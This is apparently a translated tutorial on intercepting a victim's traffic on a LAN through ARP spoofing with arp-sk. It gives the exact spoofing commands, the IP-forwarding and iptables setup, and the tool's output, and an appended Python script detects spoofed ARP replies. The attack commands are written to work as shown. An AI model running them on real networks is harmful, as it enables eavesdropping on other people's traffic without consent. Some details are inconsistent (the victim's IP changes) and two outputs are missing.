11:27 The practice of using arpspoofing
In this article I will discuss how to use the utilities of the arp-sk package in the GNU/Linux operating system to implement a man-in-the-middle attack on the ARP protocol.

Why is such an attack needed? Habr has a lot of articles on, for example, hacking Wi-Fi. But what happens after the key is compromised? Here you can see one of the options.

A bit of theory

The ARP protocol is required for transmission over Ethernet, because transfer there is done by MAC addresses. More information about the MAC address can be found in Wikipedia: ru.wikipedia.org/wiki/MAC-%D0%B0%D0%B4%D1%80%D0%B5%D1%81

For a message to be sent from one network device to another, in particular from the Victim to the Router, the computer must map the IP address to a MAC address. Consider the process with the tcpdump utility:

    # tcpdump -i eth1 -vvv
    21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168.4.17, length 28
    21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46

The first packet: a computer sends a broadcast message to find the MAC address that belongs to the IP address 192.168.4.1, with a request to send the answer to 192.168.4.11. It is not visible here, but when sending this request the computer 192.168.4.11 specifies its own MAC address as the source and the broadcast MAC address (FF:FF:FF:FF:FF:FF) as the address of the recipient. A network device that receives the packet should compare the IP address with its own and, if they match, send the next packet.

The second packet: the device with the address 192.168.4.1 answers, to the MAC address that was specified in the request and from its own MAC address, that the address 192.168.4.1 is at 00:50:ba:46:5d:92.

Because the ARP request is sent to the broadcast address, the message can be received by anyone who is in the same broadcast segment as the source.
Hence one option for an attack: always send a message announcing your own MAC address. In this case, when the Victim computer sends an ARP request for the router, it immediately gets a response from the attacker. Accordingly, traffic will be sent to the attacker.

Our goal: to get the traffic of the Victim computer using the Attacker computer. To do this we will use the spontaneous (gratuitous) ARP reply. The ARP protocol allows a device to send an ARP request or reply even when no other device has asked for it. What is this for? For example, for the case when the MAC address of the router changes. If the computer supports spontaneous ARP, it will overwrite the legitimate address with the attacker's address.

The attack

Installing the required software

Arp-sk:

    # wget sid.rstack.org/arp-sk/files/arp-sk-0.0.16.tgz
    # tar xvzf arp-sk-0.0.16.tgz
    # cd arp-sk-0.0.16/
    # ./configure
    # make

If the package compiles successfully, install it:

    # make install

The options for running the command can be viewed using

    # arp-sk --help

We need the following keys:

    Usage: arp-sk
    -r --reply       send ARP Reply
    -d --dst         recipient in the link layer (<hotname|hostip|MAC>)
    -s --src         source in the link layer (<hotname|hostip|MAC>)
    -D --arp-dst     recipient of the ARP message ([hostname|hostip][:MAC])
    -S --arp-src     source in the ARP message ([hostname|hostip][:MAC])
    -i --interface   specify the interface (eth0)

Spoofing

We need to send the router and the Victim computer ARP messages saying that the MAC address of the other device is ours. First we set up the Attacker computer to forward traffic. For this purpose, enable traffic forwarding in the kernel:

    # echo 1 > /proc/sys/net/ipv4/ip_forward

Now let's allow forwarded traffic in the packet filter. I use iptables, so I add allowing rules to the FORWARD chain.
Since the network I am attacking is a test one, I add the following rules:

    # iptables -I FORWARD 1 -s 192.168.4.17 -j ACCEPT
    # iptables -I FORWARD 2 -d 192.168.4.17 -j ACCEPT

These two rules allow the Attacker computer to forward traffic from and to the address 192.168.4.17. Attention! These rules are potentially dangerous, especially if you have multiple network interfaces. In that case I recommend using more precise rules.

Let's find out our own address:

    # ifconfig eth1 | grep HW
    eth1 Link encap:Ethernet HWaddr 00:13:CE:5C:11:34

and the addresses of the other devices:

    # arp -an
    ? (192.168.4.1) at 00:50:ba:46:5d:92 [ether] on eth1
    ? (192.168.4.17) at 00:1c:bf:41:53:4b [ether] on eth1

Let's look at the routing table of the Victim computer:

Now we send the following ARP packets, substituting our own MAC address for that of the other device. First, on behalf of 192.168.4.17, we tell 192.168.4.1 (00:50:ba:46:5d:92) that its MAC address is now 00:13:CE:5C:11:34. Second, on behalf of 192.168.4.1, we tell 192.168.4.17 (00:1c:bf:41:53:4b) that its MAC address is now 00:13:CE:5C:11:34.

    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.17 -d 00:50:ba:46:5d:92 -D 192.168.4.1
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.1 -d 00:1c:bf:41:53:4b -D 192.168.4.17

We get the following output:

    + Initialization of the packet structure
    + Running mode "reply"
    + Ifname: eth1
    + Source MAC: 00:13:ce:5c:11:34
    + Source ARP MAC: 00:13:ce:5c:11:34
    + Source ARP IP: 192.168.4.1
    + Target MAC: 00:1c:bf:41:53:4b
    + Target ARP MAC: 00:1c:bf:41:53:4b
    + Target ARP IP: 192.168.4.17
    --- Start classical sending ---
    TS: 21:30:44.338540
    To: 00:1c:bf:41:53:4b From: 00:13:ce:5c:11:34 0x0806
    ARP For 192.168.4.17 (00:1c:bf:41:53:4b):
    192.168.4.1 is at 00:13:ce:5c:11:34

Let us now look at the ARP table on the Victim computer:

That's it. Now you can run your favorite sniffer and capture the packets you need. For example, a ping to Yandex.

Addendum
If the computer has a firewall, it may display a message about the address substitution.

This information is for reference only. The author reminds you of Article 272 of the Criminal Code, "Illegal access to computer information".
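The address substitution that a firewall can report can also be spotted in captured ARP traffic. The following Python example is added here and is not code from the original article: it reads tcpdump lines in the format shown above and flags replies nobody asked for, an IP whose MAC changed, and one MAC claiming several IPs. The first two sample lines are the article's capture, the last two are constructed, and the function and alert names are hypothetical.

```python
import re
from collections import defaultdict

# First two lines: the capture quoted in the article. Last two: constructed
# lines modelling the two spoofed replies in the same tcpdump -vvv format.
SAMPLE = """\
21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168.4.17, length 28
21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46
21:30:44.338540 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:13:ce:5c:11:34 (oui Unknown), length 46
21:30:44.338901 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.17 is-at 00:13:ce:5c:11:34 (oui Unknown), length 46
"""

REQUEST = re.compile(r"Request who-has (\d+(?:\.\d+){3}) tell")
REPLY = re.compile(
    r"^(\S+) ARP,.*\bReply (\d+(?:\.\d+){3}) is-at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.I)


def detect(lines):
    """Return (timestamp, kind, ip, mac) alerts for suspicious ARP replies."""
    baseline = {}                # ip -> first MAC seen, kept as the trusted value
    claimed = defaultdict(set)   # mac -> IPs it has claimed
    pending = set()              # IPs with an outstanding who-has request
    alerts = []
    for line in lines:
        req = REQUEST.search(line)
        if req:
            pending.add(req.group(1))
            continue
        rep = REPLY.match(line)
        if not rep:
            continue
        ts, ip, mac = rep.group(1), rep.group(2), rep.group(3).lower()
        # Spontaneous replies are legal (e.g. a router MAC change): a hint only.
        if ip not in pending:
            alerts.append((ts, "unsolicited", ip, mac))
        pending.discard(ip)
        # Strongest signal: a known IP is suddenly announced with another MAC.
        if baseline.setdefault(ip, mac) != mac:
            alerts.append((ts, "changed", ip, mac))
        # One MAC answering for several IPs (here: router and victim at once).
        claimed[mac].add(ip)
        if len(claimed[mac]) > 1:
            alerts.append((ts, "multi-ip", ip, mac))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE.splitlines()):
        print(*alert)
```

On a live network the baseline is better seeded from known-good data, such as a maintained list of router and server MAC addresses, than from the first reply seen.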